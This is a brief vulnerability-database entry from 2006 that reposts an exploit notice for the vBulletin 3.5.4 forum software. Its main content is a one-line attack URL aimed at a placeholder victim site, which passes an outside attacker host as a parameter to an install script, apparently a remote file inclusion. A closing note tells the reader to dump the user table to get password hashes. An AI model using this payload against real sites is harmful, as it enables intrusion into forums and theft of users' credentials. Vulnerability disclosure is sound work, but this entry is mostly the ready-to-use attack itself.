vBulletin 3.5.4 (install_path) Exploit

2006-07-06T00:00:00
ID SECURITYVULNS:DOC:13432
Type securityvulns
Reporter Securityvulns
Modified 2006-07-06T00:00:00

Description

vBulletin 3.5.4 (install_path) Exploit

by: CarcaBot

application : vbulletin

URL : http://www.vbulletin.com

Exploit:

www.vicitimsite.com/forumpath/install/upgrade_301.php?step=http://CarcaBot.Ro

More Details: Dump SQL DB named user then u have access at all md5 users passwords...